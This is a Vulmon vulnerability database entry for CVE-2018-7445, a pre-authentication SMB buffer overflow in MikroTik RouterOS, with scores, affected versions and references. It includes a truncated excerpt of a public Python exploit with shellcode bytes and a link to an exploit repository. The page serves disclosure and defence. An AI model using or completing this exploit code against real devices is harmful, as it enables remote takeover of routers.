Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9.8
CVSSv3

CVE-2018-7445

Published: 19/03/2018 Updated: 24/04/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Mikrotik

Vulnerability Summary

A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so it is possible for an unauthenticated remote malicious user to exploit it. All architectures and all devices running RouterOS prior to 6.41.3/6.42rc27 are vulnerable.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

mikrotik routeros

mikrotik routeros 6.4.2

Exploits

Exploit DB: MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow
#!/usr/bin/env python import socket import struct import sys import telnetlib NETBIOS_SESSION_MESSAGE = "\x00" NETBIOS_SESSION_REQUEST = "\x81" NETBIOS_SESSION_FLAGS = "\x00" # trick from shell-stormorg/shellcode/files/shellcode-881php # will place the socket file descriptor in eax find_sock_fd = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48" ...

Github Repositories

https://github.com/BigNerd95/Chimay-Blue

Mikrotik SMB buffer overflow exploit

Chimay-Blue MikroTik RouterOS SMB Buffer Overflow CVE-2018-7445 wwwcoresecuritycom/advisories/mikrotik-routeros-smb-buffer-overflow creativecommonsorg/licenses/by-nc-sa/30/us/ Vulnerable versions Until RouterOS 6412 What's new in 6413 (2018-Mar-08 11:55): *) smb - improved NetBIOS name handling and stability; []

Recent Articles

APT Trends report Q1 2018
Securelist • GReAT • 12 Apr 2018

In the second quarter of 2017, Kaspersky’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports in an effort to make the public aware of the research we have been conducting. This report serves as the next installment, focusing on the relevant activities that we observed during Q1 2018. These summaries serve as a representative snapshot of what has been discussed in greater detail in our private reports, in order to highlig...

Read more...

References

CWE-119https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflowhttp://seclists.org/fulldisclosure/2018/Mar/38https://www.exploit-db.com/exploits/44290/http://www.securityfocus.com/bid/103427https://nvd.nist.govhttps://github.com/BigNerd95/Chimay-Bluehttps://www.exploit-db.com/exploits/44290/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-27322CVE-2006-4304wirelessCVE-2023-23022local file inclusionCVE-2024-27058CVE-2024-33820open redirectCVE-2024-27079
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook